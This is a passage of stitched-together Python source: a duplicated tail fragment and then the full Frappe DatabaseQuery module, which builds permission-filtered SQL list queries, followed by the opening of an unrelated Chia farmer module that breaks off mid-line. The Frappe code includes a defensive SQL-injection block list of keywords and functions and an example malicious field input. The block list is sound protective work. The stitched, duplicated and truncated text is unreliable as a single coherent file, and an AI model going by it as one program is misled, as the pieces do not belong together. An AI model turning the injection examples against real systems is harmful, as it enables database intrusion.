{f.split()[1].strip()}" for f in meta.sort_field.split(',')) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' order_by = f"`tab{doctype}`.`{sort_field or "modified"}` {sort_order or "desc"}" # draft docs always on top if meta.is_submittable: order_by = f"`tab{doctype}`.docstatus asc, {order_by}" return order_by def is_parent_only_filter(doctype, filters): #check if filters contains only parent doctype only_parent_doctype = True if isinstance(filters, list): for flt in filters: if doctype not in flt: only_parent_doctype = False if 'Between' in flt: flt[3] = get_between_date_filter(flt[3]) return only_parent_doctype def has_any_user_permission_for_doctype(doctype, user, applicable_for): user_permissions = frappe.permissions.get_user_permissions(user=user) doctype_user_permissions = user_permissions.get(doctype, []) for permission in doctype_user_permissions: if not permission.applicable_for or permission.applicable_for == applicable_for: return True return False def get_between_date_filter(value, df=None): ''' return the formattted date as per the given example [u'2017-11-01', u'2017-11-03'] => '2017-11-01 00:00:00.000000' AND '2017-11-04 00:00:00.000000' ''' from_date = frappe.utils.nowdate() to_date = frappe.utils.nowdate() if value and isinstance(value, (list, tuple)): if len(value) >= 1: from_date = value[0] if len(value) >= 2: to_date = value[1] if not df or (df and df.fieldtype == 'Datetime'): to_date = add_to_date(to_date, days=1) if df and df.fieldtype == 'Datetime': data = "'%s' AND '%s'" % ( frappe.db.format_datetime(from_date), frappe.db.format_datetime(to_date)) else: data = "'%s' AND '%s'" % ( frappe.db.format_date(from_date), frappe.db.format_date(to_date)) return data def get_additional_filter_field(additional_filters_config, f, value): additional_filter = additional_filters_config[f.operator.lower()] f = frappe._dict(frappe.get_attr(additional_filter['get_field'])()) if f.query_value: for option in f.options: option = frappe._dict(option) if option.value == value: f.value = option.query_value return f def get_date_range(operator, value): timespan_map = { '1 week': 'week', '1 month': 'month', '3 months': 'quarter', '6 months': '6 months', '1 year': 'year', } period_map = { 'previous': 'last', 'next': 'next', } timespan = period_map[operator] + ' ' + timespan_map[value] if operator != 'timespan' else value return get_timespan_date_range(timespan) def requires_owner_constraint(role_permissions): """Returns True if "select" or "read" isn't available without being creator.""" if not role_permissions.get("has_if_owner_enabled"): return if_owner_perms = role_permissions.get("if_owner") if not if_owner_perms: return # has select or read without if owner, no need for constraint for perm_type in ("select", "read"): if role_permissions.get(perm_type) and perm_type not in if_owner_perms: return # not checking if either select or read if present in if_owner_perms # because either of those is required to perform a query return True
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: MIT. See LICENSE """build query for doclistview and return results""" from typing import List import frappe.defaults from frappe.query_builder.utils import Column import frappe.share from frappe import _ import frappe.permissions from datetime import datetime import frappe, json, copy, re from frappe.model import optional_fields from frappe.model.utils.user_settings import get_user_settings, update_user_settings from frappe.utils import flt, cint, get_time, make_filter_tuple, get_filter, add_to_date, cstr, get_timespan_date_range from frappe.model.meta import get_table_columns from frappe.core.doctype.server_script.server_script_utils import get_server_script_map class DatabaseQuery(object): def __init__(self, doctype, user=None): self.doctype = doctype self.tables = [] self.conditions = [] self.or_conditions = [] self.fields = None self.user = user or frappe.session.user self.ignore_ifnull = False self.flags = frappe._dict() self.reference_doctype = None def execute(self, fields=None, filters=None, or_filters=None, docstatus=None, group_by=None, order_by="KEEP_DEFAULT_ORDERING", limit_start=False, limit_page_length=None, as_list=False, with_childnames=False, debug=False, ignore_permissions=False, user=None, with_comment_count=False, join='left join', distinct=False, start=None, page_length=None, limit=None, ignore_ifnull=False, save_user_settings=False, save_user_settings_fields=False, update=None, add_total_row=None, user_settings=None, reference_doctype=None, run=True, strict=True, pluck=None, ignore_ddl=False, parent_doctype=None) -> List: if ( not ignore_permissions and not frappe.has_permission(self.doctype, "select", user=user, parent_doctype=parent_doctype) and not frappe.has_permission(self.doctype, "read", user=user, parent_doctype=parent_doctype) ): frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(self.doctype)) raise frappe.PermissionError(self.doctype) # filters and fields swappable # its hard to remember what comes first if ( isinstance(fields, dict) or ( fields and isinstance(fields, list) and isinstance(fields[0], list) ) ): # if fields is given as dict/list of list, its probably filters filters, fields = fields, filters elif fields and isinstance(filters, list) \ and len(filters) > 1 and isinstance(filters[0], str): # if `filters` is a list of strings, its probably fields filters, fields = fields, filters if fields: self.fields = fields else: self.fields = [f"`tab{self.doctype}`.`{pluck or 'name'}`"] if start: limit_start = start if page_length: limit_page_length = page_length if limit: limit_page_length = limit self.filters = filters or [] self.or_filters = or_filters or [] self.docstatus = docstatus or [] self.group_by = group_by self.order_by = order_by self.limit_start = cint(limit_start) self.limit_page_length = cint(limit_page_length) if limit_page_length else None self.with_childnames = with_childnames self.debug = debug self.join = join self.distinct = distinct self.as_list = as_list self.ignore_ifnull = ignore_ifnull self.flags.ignore_permissions = ignore_permissions self.user = user or frappe.session.user self.update = update self.user_settings_fields = copy.deepcopy(self.fields) self.run = run self.strict = strict self.ignore_ddl = ignore_ddl # for contextual user permission check # to determine which user permission is applicable on link field of specific doctype self.reference_doctype = reference_doctype or self.doctype if user_settings: self.user_settings = json.loads(user_settings) self.columns = self.get_table_columns() # no table & ignore_ddl, return if not self.columns: return [] result = self.build_and_run() if with_comment_count and not as_list and self.doctype: self.add_comment_count(result) if save_user_settings: self.save_user_settings_fields = save_user_settings_fields self.update_user_settings() if pluck: return [d[pluck] for d in result] return result def build_and_run(self): args = self.prepare_args() args.limit = self.add_limit() if args.conditions: args.conditions = "where " + args.conditions if self.distinct: args.fields = 'distinct ' + args.fields args.order_by = '' # TODO: recheck for alternative # Postgres requires any field that appears in the select clause to also # appear in the order by and group by clause if frappe.db.db_type == 'postgres' and args.order_by and args.group_by: args = self.prepare_select_args(args) query = """select %(fields)s from %(tables)s %(conditions)s %(group_by)s %(order_by)s %(limit)s""" % args return frappe.db.sql(query, as_dict=not self.as_list, debug=self.debug, update=self.update, ignore_ddl=self.ignore_ddl, run=self.run) def prepare_args(self): self.parse_args() self.sanitize_fields() self.extract_tables() self.set_optional_columns() self.build_conditions() args = frappe._dict() if self.with_childnames: for t in self.tables: if t != "`tab" + self.doctype + "`": self.fields.append(t + ".name as '%s:name'" % t[4:-1]) # query dict args.tables = self.tables[0] # left join parent, child tables for child in self.tables[1:]: args.tables += f" {self.join} {child} on ({child}.parent = {self.tables[0]}.name)" if self.grouped_or_conditions: self.conditions.append(f"({' or '.join(self.grouped_or_conditions)})") args.conditions = ' and '.join(self.conditions) if self.or_conditions: args.conditions += (' or ' if args.conditions else "") + \ ' or '.join(self.or_conditions) self.set_field_tables() fields = [] # Wrapping fields with grave quotes to allow support for sql keywords # TODO: Add support for wrapping fields with sql functions and distinct keyword for field in self.fields: stripped_field = field.strip().lower() skip_wrapping = any([ stripped_field.startswith(("`", "*", '"', "'")), "(" in stripped_field, "distinct" in stripped_field, ]) if skip_wrapping: fields.append(field) elif "as" in field.lower().split(" "): col, _, new = field.split() fields.append(f"`{col}` as {new}") else: fields.append(f"`{field}`") args.fields = ", ".join(fields) self.set_order_by(args) self.validate_order_by_and_group_by(args.order_by) args.order_by = args.order_by and (" order by " + args.order_by) or "" self.validate_order_by_and_group_by(self.group_by) args.group_by = self.group_by and (" group by " + self.group_by) or "" return args def prepare_select_args(self, args): order_field = re.sub(r"\ order\ by\ |\ asc|\ ASC|\ desc|\ DESC", "", args.order_by) if order_field not in args.fields: extracted_column = order_column = order_field.replace("`", "") if "." in extracted_column: extracted_column = extracted_column.split(".")[1] args.fields += f", MAX({extracted_column}) as `{order_column}`" args.order_by = args.order_by.replace(order_field, f"`{order_column}`") return args def parse_args(self): """Convert fields and filters from strings to list, dicts""" if isinstance(self.fields, str): if self.fields == "*": self.fields = ["*"] else: try: self.fields = json.loads(self.fields) except ValueError: self.fields = [f.strip() for f in self.fields.split(",")] # remove empty strings / nulls in fields self.fields = [f for f in self.fields if f] for filter_name in ["filters", "or_filters"]: filters = getattr(self, filter_name) if isinstance(filters, str): filters = json.loads(filters) if isinstance(filters, dict): fdict = filters filters = [] for key, value in fdict.items(): filters.append(make_filter_tuple(self.doctype, key, value)) setattr(self, filter_name, filters) def sanitize_fields(self): ''' regex : ^.*[,();].* purpose : The regex will look for malicious patterns like `,`, '(', ')', '@', ;' in each field which may leads to sql injection. example : field = "`DocType`.`issingle`, version()" As field contains `,` and mysql function `version()`, with the help of regex the system will filter out this field. ''' sub_query_regex = re.compile("^.*[,();@].*") blacklisted_keywords = ['select', 'create', 'insert', 'delete', 'drop', 'update', 'case', 'show'] blacklisted_functions = ['concat', 'concat_ws', 'if', 'ifnull', 'nullif', 'coalesce', 'connection_id', 'current_user', 'database', 'last_insert_id', 'session_user', 'system_user', 'user', 'version', 'global'] def _raise_exception(): frappe.throw(_('Use of sub-query or function is restricted'), frappe.DataError) def _is_query(field): if re.compile(r"^(select|delete|update|drop|create)\s").match(field): _raise_exception() elif re.compile(r"\s*[0-9a-zA-z]*\s*( from | group by | order by | where | join )").match(field): _raise_exception() for field in self.fields: if sub_query_regex.match(field): if any(keyword in field.lower().split() for keyword in blacklisted_keywords): _raise_exception() if any(f"({keyword}" in field.lower() for keyword in blacklisted_keywords): _raise_exception() if any(f"{keyword}(" in field.lower() for keyword in blacklisted_functions): _raise_exception() if '@' in field.lower(): # prevent access to global variables _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*'").match(field): _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*,").match(field): _raise_exception() _is_query(field) if self.strict: if re.compile(r".*/\*.*").match(field): frappe.throw(_('Illegal SQL Query')) if re.compile(r".*\s(union).*\s").match(field.lower()): frappe.throw(_('Illegal SQL Query')) def extract_tables(self): """extract tables from fields""" self.tables = [f"`tab{self.doctype}`"] sql_functions = [ "dayofyear(", "extract(", "locate(", "strpos(", "count(", "sum(", "avg(", ] # add tables from fields if self.fields: for field in self.fields: if not ("tab" in field and "." in field) or any(x for x in sql_functions if x in field): continue table_name = field.split('.')[0] if table_name.lower().startswith('group_concat('): table_name = table_name[13:] if table_name.lower().startswith('ifnull('): table_name = table_name[7:] if not table_name[0]=='`': table_name = f"`{table_name}`" if not table_name in self.tables: self.append_table(table_name) def append_table(self, table_name): self.tables.append(table_name) doctype = table_name[4:-1] ptype = 'select' if frappe.only_has_select_perm(doctype) else 'read' if not self.flags.ignore_permissions and \ not frappe.has_permission(doctype, ptype=ptype, parent_doctype=self.doctype): frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(doctype)) raise frappe.PermissionError(doctype) def set_field_tables(self): '''If there are more than one table, the fieldname must not be ambiguous. If the fieldname is not explicitly mentioned, set the default table''' def _in_standard_sql_methods(field): methods = ('count(', 'avg(', 'sum(', 'extract(', 'dayofyear(') return field.lower().startswith(methods) if len(self.tables) > 1: for idx, field in enumerate(self.fields): if '.' not in field and not _in_standard_sql_methods(field): self.fields[idx] = f"{self.tables[0]}.{field}" def get_table_columns(self): try: return get_table_columns(self.doctype) except frappe.db.TableMissingError: if self.ignore_ddl: return None else: raise def set_optional_columns(self): """Removes optional columns like `_user_tags`, `_comments` etc. if not in table""" # remove from fields to_remove = [] for fld in self.fields: for f in optional_fields: if f in fld and not f in self.columns: to_remove.append(fld) for fld in to_remove: del self.fields[self.fields.index(fld)] # remove from filters to_remove = [] for each in self.filters: if isinstance(each, str): each = [each] for element in each: if element in optional_fields and element not in self.columns: to_remove.append(each) for each in to_remove: if isinstance(self.filters, dict): del self.filters[each] else: self.filters.remove(each) def build_conditions(self): self.conditions = [] self.grouped_or_conditions = [] self.build_filter_conditions(self.filters, self.conditions) self.build_filter_conditions(self.or_filters, self.grouped_or_conditions) # match conditions if not self.flags.ignore_permissions: match_conditions = self.build_match_conditions() if match_conditions: self.conditions.append(f"({match_conditions})") def build_filter_conditions(self, filters, conditions, ignore_permissions=None): """build conditions from user filters""" if ignore_permissions is not None: self.flags.ignore_permissions = ignore_permissions if isinstance(filters, dict): filters = [filters] for f in filters: if isinstance(f, str): conditions.append(f) else: conditions.append(self.prepare_filter_condition(f)) def prepare_filter_condition(self, f): """Returns a filter condition in the format: ifnull(`tabDocType`.`fieldname`, fallback) operator "value" """ from frappe.boot import get_additional_filters_from_hooks additional_filters_config = get_additional_filters_from_hooks() f = get_filter(self.doctype, f, additional_filters_config) tname = ('`tab' + f.doctype + '`') if not tname in self.tables: self.append_table(tname) if 'ifnull(' in f.fieldname: column_name = f.fieldname else: column_name = f"{tname}.{f.fieldname}" can_be_null = True if f.operator.lower() in additional_filters_config: f.update(get_additional_filter_field(additional_filters_config, f, f.value)) # prepare in condition if f.operator.lower() in ('ancestors of', 'descendants of', 'not ancestors of', 'not descendants of'): values = f.value or '' # TODO: handle list and tuple # if not isinstance(values, (list, tuple)): # values = values.split(",") ref_doctype = f.doctype if frappe.get_meta(f.doctype).get_field(f.fieldname) is not None : ref_doctype = frappe.get_meta(f.doctype).get_field(f.fieldname).options result=[] lft, rgt = '', '' if f.value: lft, rgt = frappe.db.get_value(ref_doctype, f.value, ["lft", "rgt"]) # Get descendants elements of a DocType with a tree structure if f.operator.lower() in ('descendants of', 'not descendants of') : result = frappe.get_all(ref_doctype, filters={ 'lft': ['>', lft], 'rgt': ['<', rgt] }, order_by='`lft` ASC') else : # Get ancestor elements of a DocType with a tree structure result = frappe.get_all(ref_doctype, filters={ 'lft': ['<', lft], 'rgt': ['>', rgt] }, order_by='`lft` DESC') fallback = "''" value = [frappe.db.escape((v.name or '').strip(), percent=False) for v in result] if len(value): value = f"({', '.join(value)})" else: value = "('')" # changing operator to IN as the above code fetches all the parent / child values and convert into tuple # which can be directly used with IN operator to query. f.operator = 'not in' if f.operator.lower() in ('not ancestors of', 'not descendants of') else 'in' elif f.operator.lower() in ('in', 'not in'): values = f.value or '' if isinstance(values, str): values = values.split(",") fallback = "''" value = [frappe.db.escape((v or '').strip(), percent=False) for v in values] if len(value): value = f"({', '.join(value)})" else: value = "('')" else: df = frappe.get_meta(f.doctype).get("fields", {"fieldname": f.fieldname}) df = df[0] if df else None if df and df.fieldtype in ("Check", "Float", "Int", "Currency", "Percent"): can_be_null = False if f.operator.lower() in ('previous', 'next', 'timespan'): date_range = get_date_range(f.operator.lower(), f.value) f.operator = "Between" f.value = date_range fallback = "'0001-01-01 00:00:00'" if f.operator in ('>', '<') and (f.fieldname in ('creation', 'modified')): value = cstr(f.value) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() in ('between') and \ (f.fieldname in ('creation', 'modified') or (df and (df.fieldtype=="Date" or df.fieldtype=="Datetime"))): value = get_between_date_filter(f.value, df) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() == "is": if f.value == 'set': f.operator = '!=' elif f.value == 'not set': f.operator = '=' value = "" fallback = "''" can_be_null = True if 'ifnull' not in column_name: column_name = f'ifnull({column_name}, {fallback})' elif df and df.fieldtype=="Date": value = frappe.db.format_date(f.value) fallback = "'0001-01-01'" elif (df and df.fieldtype=="Datetime") or isinstance(f.value, datetime): value = frappe.db.format_datetime(f.value) fallback = "'0001-01-01 00:00:00'" elif df and df.fieldtype=="Time": value = get_time(f.value).strftime("%H:%M:%S.%f") fallback = "'00:00:00'" elif f.operator.lower() in ("like", "not like") or (isinstance(f.value, str) and (not df or df.fieldtype not in ["Float", "Int", "Currency", "Percent", "Check"])): value = "" if f.value is None else f.value fallback = "''" if f.operator.lower() in ("like", "not like") and isinstance(value, str): # because "like" uses backslash (\) for escaping value = value.replace("\\", "\\\\").replace("%", "%%") elif f.operator == '=' and df and df.fieldtype in ['Link', 'Data']: # TODO: Refactor if possible value = f.value or "''" fallback = "''" elif f.fieldname == 'name': value = f.value or "''" fallback = "''" else: value = flt(f.value) fallback = 0 if isinstance(f.value, Column): can_be_null = False # added to avoid the ifnull/coalesce addition quote = '"' if frappe.conf.db_type == 'postgres' else "`" value = f"{tname}.{quote}{f.value.name}{quote}" # escape value elif isinstance(value, str) and not f.operator.lower() == 'between': value = f"{frappe.db.escape(value, percent=False)}" if ( self.ignore_ifnull or not can_be_null or (f.value and f.operator.lower() in ('=', 'like')) or 'ifnull(' in column_name.lower() ): if f.operator.lower() == 'like' and frappe.conf.get('db_type') == 'postgres': f.operator = 'ilike' condition = f'{column_name} {f.operator} {value}' else: condition = f'ifnull({column_name}, {fallback}) {f.operator} {value}' return condition def build_match_conditions(self, as_condition=True): """add match conditions if applicable""" self.match_filters = [] self.match_conditions = [] only_if_shared = False if not self.user: self.user = frappe.session.user if not self.tables: self.extract_tables() meta = frappe.get_meta(self.doctype) role_permissions = frappe.permissions.get_role_permissions(meta, user=self.user) self.shared = frappe.share.get_shared(self.doctype, self.user) if ( not meta.istable and not (role_permissions.get("select") or role_permissions.get("read")) and not self.flags.ignore_permissions and not has_any_user_permission_for_doctype(self.doctype, self.user, self.reference_doctype) ): only_if_shared = True if not self.shared: frappe.throw(_("No permission to read {0}").format(self.doctype), frappe.PermissionError) else: self.conditions.append(self.get_share_condition()) else: # skip user perm check if owner constraint is required if requires_owner_constraint(role_permissions): self.match_conditions.append( f"`tab{self.doctype}`.`owner` = {frappe.db.escape(self.user, percent=False)}" ) # add user permission only if role has read perm elif role_permissions.get("read") or role_permissions.get("select"): # get user permissions user_permissions = frappe.permissions.get_user_permissions(self.user) self.add_user_permissions(user_permissions) if as_condition: conditions = "" if self.match_conditions: # will turn out like ((blog_post in (..) and blogger in (...)) or (blog_category in (...))) conditions = "((" + ") or (".join(self.match_conditions) + "))" doctype_conditions = self.get_permission_query_conditions() if doctype_conditions: conditions += (' and ' + doctype_conditions) if conditions else doctype_conditions # share is an OR condition, if there is a role permission if not only_if_shared and self.shared and conditions: conditions = f"({conditions}) or ({self.get_share_condition()})" return conditions else: return self.match_filters def get_share_condition(self): return f"`tab{self.doctype}`.name in ({', '.join(frappe.db.escape(s, percent=False) for s in self.shared)})" def add_user_permissions(self, user_permissions): meta = frappe.get_meta(self.doctype) doctype_link_fields = [] doctype_link_fields = meta.get_link_fields() # append current doctype with fieldname as 'name' as first link field doctype_link_fields.append(dict( options=self.doctype, fieldname='name', )) match_filters = {} match_conditions = [] for df in doctype_link_fields: if df.get('ignore_user_permissions'): continue user_permission_values = user_permissions.get(df.get('options'), {}) if user_permission_values: docs = [] if frappe.get_system_settings("apply_strict_user_permissions"): condition = "" else: empty_value_condition = f"ifnull(`tab{self.doctype}`.`{df.get('fieldname')}`, '')=''" condition = empty_value_condition + " or " for permission in user_permission_values: if not permission.get('applicable_for'): docs.append(permission.get('doc')) # append docs based on user permission applicable on reference doctype # this is useful when getting list of docs from a link field # in this case parent doctype of the link # will be the reference doctype elif df.get('fieldname') == 'name' and self.reference_doctype: if permission.get('applicable_for') == self.reference_doctype: docs.append(permission.get('doc')) elif permission.get('applicable_for') == self.doctype: docs.append(permission.get('doc')) if docs: values = ", ".join(frappe.db.escape(doc, percent=False) for doc in docs) condition += f"`tab{self.doctype}`.`{df.get('fieldname')}` in ({values})" match_conditions.append(f"({condition})") match_filters[df.get('options')] = docs if match_conditions: self.match_conditions.append(" and ".join(match_conditions)) if match_filters: self.match_filters.append(match_filters) def get_permission_query_conditions(self): conditions = [] condition_methods = frappe.get_hooks("permission_query_conditions", {}).get(self.doctype, []) if condition_methods: for method in condition_methods: c = frappe.call(frappe.get_attr(method), self.user) if c: conditions.append(c) permision_script_name = get_server_script_map().get("permission_query", {}).get(self.doctype) if permision_script_name: script = frappe.get_doc("Server Script", permision_script_name) condition = script.get_permission_query_conditions(self.user) if condition: conditions.append(condition) return " and ".join(conditions) if conditions else "" def set_order_by(self, args): meta = frappe.get_meta(self.doctype) if self.order_by and self.order_by != "KEEP_DEFAULT_ORDERING": args.order_by = self.order_by else: args.order_by = "" # don't add order by from meta if a mysql group function is used without group by clause group_function_without_group_by = (len(self.fields)==1 and ( self.fields[0].lower().startswith("count(") or self.fields[0].lower().startswith("min(") or self.fields[0].lower().startswith("max(") ) and not self.group_by) if not group_function_without_group_by: sort_field = sort_order = None if meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc args.order_by = ', '.join( f"`tab{self.doctype}`.`{f.split()[0].strip()}` {f.split()[1].strip()}" for f in meta.sort_field.split(',') ) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' if self.order_by: args.order_by = f"`tab{self.doctype}`.`{sort_field or 'modified'}` {sort_order or 'desc'}" # draft docs always on top if hasattr(meta, 'is_submittable') and meta.is_submittable: if self.order_by: args.order_by = f"`tab{self.doctype}`.docstatus asc, {args.order_by}" def validate_order_by_and_group_by(self, parameters): """Check order by, group by so that atleast one column is selected and does not have subquery""" if not parameters: return _lower = parameters.lower() if 'select' in _lower and 'from' in _lower: frappe.throw(_('Cannot use sub-query in order by')) if re.compile(r".*[^a-z0-9-_ ,`'\"\.\(\)].*").match(_lower): frappe.throw(_('Illegal SQL Query')) for field in parameters.split(","): if "." in field and field.strip().startswith("`tab"): tbl = field.strip().split('.')[0] if tbl not in self.tables: if tbl.startswith('`'): tbl = tbl[4:-1] frappe.throw(_("Please select atleast 1 column from {0} to sort/group").format(tbl)) def add_limit(self): if self.limit_page_length: return 'limit %s offset %s' % (self.limit_page_length, self.limit_start) else: return '' def add_comment_count(self, result): for r in result: if not r.name: continue r._comment_count = 0 if "_comments" in r: r._comment_count = len(json.loads(r._comments or "[]")) def update_user_settings(self): # update user settings if new search user_settings = json.loads(get_user_settings(self.doctype)) if hasattr(self, 'user_settings'): user_settings.update(self.user_settings) if self.save_user_settings_fields: user_settings['fields'] = self.user_settings_fields update_user_settings(self.doctype, user_settings) def check_parent_permission(parent, child_doctype): if parent: # User may pass fake parent and get the information from the child table if child_doctype and not ( frappe.db.exists('DocField', {'parent': parent, 'options': child_doctype}) or frappe.db.exists('Custom Field', {'dt': parent, 'options': child_doctype}) ): raise frappe.PermissionError if frappe.permissions.has_permission(parent): return # Either parent not passed or the user doesn't have permission on parent doctype of child table! raise frappe.PermissionError def get_order_by(doctype, meta): order_by = "" sort_field = sort_order = None if meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc order_by = ', '.join(f"`tab{doctype}`.`{f.split()[0].strip()}` {f.split()[1].strip()}" for f in meta.sort_field.split(',')) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' order_by = f"`tab{doctype}`.`{sort_field or 'modified'}` {sort_order or 'desc'}" # draft docs always on top if meta.is_submittable: order_by = f"`tab{doctype}`.docstatus asc, {order_by}" return order_by def is_parent_only_filter(doctype, filters): #check if filters contains only parent doctype only_parent_doctype = True if isinstance(filters, list): for flt in filters: if doctype not in flt: only_parent_doctype = False if 'Between' in flt: flt[3] = get_between_date_filter(flt[3]) return only_parent_doctype def has_any_user_permission_for_doctype(doctype, user, applicable_for): user_permissions = frappe.permissions.get_user_permissions(user=user) doctype_user_permissions = user_permissions.get(doctype, []) for permission in doctype_user_permissions: if not permission.applicable_for or permission.applicable_for == applicable_for: return True return False def get_between_date_filter(value, df=None): ''' return the formattted date as per the given example [u'2017-11-01', u'2017-11-03'] => '2017-11-01 00:00:00.000000' AND '2017-11-04 00:00:00.000000' ''' from_date = frappe.utils.nowdate() to_date = frappe.utils.nowdate() if value and isinstance(value, (list, tuple)): if len(value) >= 1: from_date = value[0] if len(value) >= 2: to_date = value[1] if not df or (df and df.fieldtype == 'Datetime'): to_date = add_to_date(to_date, days=1) if df and df.fieldtype == 'Datetime': data = "'%s' AND '%s'" % ( frappe.db.format_datetime(from_date), frappe.db.format_datetime(to_date)) else: data = "'%s' AND '%s'" % ( frappe.db.format_date(from_date), frappe.db.format_date(to_date)) return data def get_additional_filter_field(additional_filters_config, f, value): additional_filter = additional_filters_config[f.operator.lower()] f = frappe._dict(frappe.get_attr(additional_filter['get_field'])()) if f.query_value: for option in f.options: option = frappe._dict(option) if option.value == value: f.value = option.query_value return f def get_date_range(operator, value): timespan_map = { '1 week': 'week', '1 month': 'month', '3 months': 'quarter', '6 months': '6 months', '1 year': 'year', } period_map = { 'previous': 'last', 'next': 'next', } timespan = period_map[operator] + ' ' + timespan_map[value] if operator != 'timespan' else value return get_timespan_date_range(timespan) def requires_owner_constraint(role_permissions): """Returns True if "select" or "read" isn't available without being creator.""" if not role_permissions.get("has_if_owner_enabled"): return if_owner_perms = role_permissions.get("if_owner") if not if_owner_perms: return # has select or read without if owner, no need for constraint for perm_type in ("select", "read"): if role_permissions.get(perm_type) and perm_type not in if_owner_perms: return # not checking if either select or read if present in if_owner_perms # because either of those is required to perform a query return True
import asyncio import json import logging import time from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Tuple import traceback import aiohttp from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey import chia.server.ws_connection as ws # lgtm [py/import-and-import-from] from chia.consensus.coinbase import create_puzzlehash_for_pk from chia.consensus.constants import ConsensusConstants from chia.daemon.keychain_proxy import ( KeychainProxy, KeychainProxyConnectionFailure, connect_to_keychain_and_validate, wrap_local_keychain, ) from chia.pools.pool_config import PoolWalletConfig, load_pool_config from chia.protocols import farmer_protocol, harvester_protocol from chia.protocols.pool_protocol import ( ErrorResponse, get_current_authentication_token, GetFarmerResponse, PoolErrorCode, PostFarmerPayload, PostFarmerRequest, PutFarmerPayload, PutFarmerRequest, AuthenticationPayload, ) from chia.protocols.protocol_message_types import ProtocolMessageTypes from chia.server.outbound_message import NodeType, make_msg from chia.server.server import ssl_context_for_root from chia.server.ws_connection import WSChiaConnection from chia.ssl.create_ssl import get_mozilla_ca_crt from chia.types.blockchain_format.proof_of_space import ProofOfSpace from chia.types.blockchain_format.sized_bytes import bytes32 from chia.util.bech32m import decode_puzzle_hash from chia.util.byte_types import hexstr_to_bytes from chia.util.config import load_config, save_config, config_path_for_filename from chia.util.hash import std_hash from chia.util.ints import uint8, uint16, uint32, uint64 from chia.util.keychain import Keychain from chia.wallet.derive_keys import ( master_sk_to_farmer_sk, master_sk_to_pool_sk, master_sk_to_wallet_sk, find_authentication_sk, find_owner_sk, ) from chia.wallet.puzzles.singleton_top_layer import SINGLETON_MOD singleton_mod_hash = SINGLETON_MOD.get_tree_hash() log = logging.getLogger(__name__) UPDATE_POOL_INFO_INTERVAL: int = 3600 UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300 UPDATE_HARVESTER_CACHE_INTERVAL: int = 90 """ HARVESTER PROTOCOL (FARMER <-> HARVESTER) """ class HarvesterCacheEntry: def __init__(self): self.data: Optional[dict] = None self.last_update: float = 0 def bump_last_update(self): self.last_update = time.time() def set_data(self, data): self.data = data self.bump_last_update() def needs_update(self): return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL def expired(self): return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL * 10 class Farmer: def __init__( self, root_path: Path, farmer_config: Dict, pool_config: Dict, consensus_constants: ConsensusConstants, local_keychain: Optional[Keychain] = None, ): self.keychain_proxy: Optional[KeychainProxy] = None self.local_keychain = local_keychain self._root_path = root_path self.config = farmer_config self.pool_config = pool_config # Keep track of all sps, keyed on challenge chain signage point hash self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {} # Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {} # Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {} # number of responses to each signage point self.number_of_responses: Dict[bytes32, int] = {} # A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used # to periodically clear the memory self.cache_add_time: Dict[bytes32, uint64] = {} self.cache_clear_task: asyncio.Task self.update_pool_state_task: asyncio.Task self.constants = consensus_constants self._shut_down = False self.server: Any = None self.state_changed_callback: Optional[Callable] = None self.log = log async def ensure_keychain_proxy(self) -> KeychainProxy: if not self.keychain_proxy: if self.local_keychain: self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log) else: self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log) if not self.keychain_proxy: raise KeychainProxyConnectionFailure("Failed to connect to keychain service") return self.keychain_proxy async def get_all_private_keys(self): keychain_proxy = await self.ensure_keychain_proxy() return await keychain_proxy.get_all_private_keys() async def setup_keys(self): self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()] self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [ master_sk_to_pool_sk(sk) for sk in self.all_root_sks ] if len(self.get_public_keys()) == 0: error_str = "No keys exist. Please run 'chia keys generate' or open the UI." raise RuntimeError(error_str) # This is the farmer configuration self.farmer_target_encoded = self.config["xch_target_address"] self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded) self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]] # This is the self pooling configuration, which is only used for original self-pooled plots self.pool_target_encoded = self.pool_config["xch_target_address"] self.pool_target = decode_puzzle_hash(self.pool_target_encoded) self.pool_sks_map: Dict = {} for key in self.get_private_keys(): self.pool_sks_map[bytes(key.get_g1())] = key assert len(self.farmer_target) == 32 assert len(self.pool_target) == 32 if len(self.pool_sks_map) == 0: error_str = "No keys exist. Please run 'chia keys generate' or open the UI." raise RuntimeError(error_str) # The variables below are for use with an actual pool # From p2_singleton_puzzle_hash to pool state dict self.pool_state: Dict[bytes32, Dict] = {} # From public key bytes to PrivateKey self.authentication_keys: Dict[bytes, PrivateKey] = {} # Last time we updated pool_state based on the config file self.last_config_access_time: uint64 = uint64(0) self.harvester_cache: Dict[str, Dict[str, HarvesterCacheEntry]] = 